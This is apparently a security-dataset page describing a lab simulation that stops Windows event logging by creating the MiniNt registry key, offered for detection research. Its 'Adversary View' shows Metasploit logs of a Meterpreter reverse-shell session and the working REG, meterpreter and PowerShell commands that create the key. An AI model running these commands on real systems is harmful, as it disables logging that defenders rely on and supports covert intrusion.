Stopping Event Logging via Creation of MiniNt Registry Key
Contents
Stopping Event Logging via Creation of MiniNt Registry Key#
Metadata#
Contributors |
Jose Rodriguez @Cyb3rPandaH |
Creation Date |
2022/08/03 |
Modification Date |
2022/08/03 |
Tactics |
|
Techniques |
|
Tags |
reg,powershell,eventlog,minint |
Dataset Description#
After getting an elevated meterpreter session, we added the MiniNt registry key in the following hives HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control and HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control. After rebooting the system and trying to access event logs trough the Event Viewer application, we got the following message Event Viewer cannot open the event log or custom view. Verify that Event Log service is running or query is too long. The request is not supported (50). We have simulated this attack using 3 different procedures REG command via cmd.exe, REG meterpreter command (Metasploit), and the PowerShell module (Metasploit). These datasets describe the before-rebooitng phase of the simulation, and they were generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30).
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Host |
|
Host |
|
Host |
|
Host |
|
Host |
Adversary View#
**** Using reg command via cmd.exe:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: vtlafkal) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 11 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 22:22:26 -0400
meterpreter > shell
Process 8784 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\IT01-Pedro\Downloads>REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt
The operation completed successfully.
C:\Users\IT01-Pedro\Downloads>
**** Using reg meterpreter command:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: y2cffmed) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:01:55 -0400
meterpreter > reg createkey -k 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt'
Successfully created key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt
meterpreter >
**** Using PowerShell module:
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: 9203cnga) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 9 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:43:05 -0400
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute "New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Control\MiniNt"
[+] Command execution completed:
Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Name Property
---- --------
MiniNt
meterpreter >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_stop_event_logging_controlset_minint_key.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)